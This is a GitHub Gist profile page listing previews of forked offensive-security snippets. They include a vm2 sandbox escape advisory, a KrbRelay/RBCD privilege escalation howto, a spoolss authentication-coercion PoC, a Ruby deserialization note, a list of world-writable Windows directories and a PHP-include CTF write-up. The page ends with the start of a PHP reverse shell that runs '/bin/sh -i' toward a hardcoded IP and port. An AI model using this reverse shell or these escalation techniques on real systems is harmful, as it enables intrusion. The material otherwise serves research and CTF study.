Skip to content

Instantly share code, notes, and snippets.

View FDlucifer's full-sized avatar
❄️
fd 2-bits..

0xfd FDlucifer

❄️
fd 2-bits..
View GitHub Profile
@FDlucifer
FDlucifer / js_ast.md
Created May 29, 2025 09:33 — forked from snailkn/js_ast.md
JS AST的简单应用:解析、修改、格式化

JS - AST基本概念

AST是Abstract Syntax Tree的缩写,可直译为抽象语法树。AST是对js代码逻辑的一种抽象分解,它把代码的计算逻辑细化,并按计算顺序以树的形式存储。利用AST,我们可以实现很多需求,例如语法高亮、语法检查、代码混淆等,babel就是以AST作为基础对js代码进行处理的。关于AST的操作总结下来无非3种:

  • 把js代码解析为AST
  • 按照需求修改AST
  • 把AST格式化为js代码

好在js生态里已经有成熟的工具帮我们实现

@FDlucifer
FDlucifer / vm2_3.9.16_sandbox_escape.md
Created April 7, 2024 01:14 — forked from leesh3288/vm2_3.9.16_sandbox_escape.md
Sandbox Escape in vm2@3.9.16

Sandbox Escape in vm2@3.9.16

Summary

There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside handleException() which can be used to escape the sandbox and run arbitrary code in host context.

Proof of Concept

@FDlucifer
FDlucifer / krbrelay_privesc_howto.md
Created May 31, 2023 04:59 — forked from tothi/krbrelay_privesc_howto.md
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@FDlucifer
FDlucifer / dementor.py
Created May 30, 2023 05:15 — forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser

Based on excellent write-up from https://www.elttam.com.au/blog/ruby-deserialization/

Doesn't work to use YAML.dump(payload) in the above script. This only produces the following YAML, which is worthless:

--- !ruby/object:Gem::Requirement
requirements:
- - ">="
  - !ruby/object:Gem::Version
 version: '0'
@FDlucifer
FDlucifer / WorldWritableDirs.txt
Created April 2, 2023 04:26 — forked from mattifestation/WorldWritableDirs.txt
World-writable directories in %windir%
c:\windows\system32\microsoft\crypto\rsa\machinekeys
c:\windows\system32\tasks_migrated\microsoft\windows\pla\system
c:\windows\syswow64\tasks\microsoft\windows\pla\system
c:\windows\debug\wia
c:\windows\system32\tasks
c:\windows\syswow64\tasks
c:\windows\tasks
c:\windows\registration\crmlog
c:\windows\system32\com\dmp
c:\windows\system32\fxstmp
@FDlucifer
FDlucifer / slideshare-dl.py
Created February 20, 2023 10:02 — forked from julionc/slideshare-dl.py
slideshare-dl is a small command-line program for downloading slides from SlideShare.net
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
slideshare-dl.py
~~~~~~~~~~~~~~~~
slideshare-dl is a small command-line program
for downloading slides from SlideShare.net
import base64
import re
import xml.dom.minidom
import json
import uuid
import struct
import string
import random
import hashlib
import time
@FDlucifer
FDlucifer / writeup.md
Created January 22, 2023 08:41 — forked from loknop/writeup.md
Solving "includer's revenge" from hxp ctf 2021 without controlling any files

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

@FDlucifer
FDlucifer / reverse-shell.php
Created January 22, 2023 08:03 — forked from noobpk/reverse-shell.php
Php Reverse Shell
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.12'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';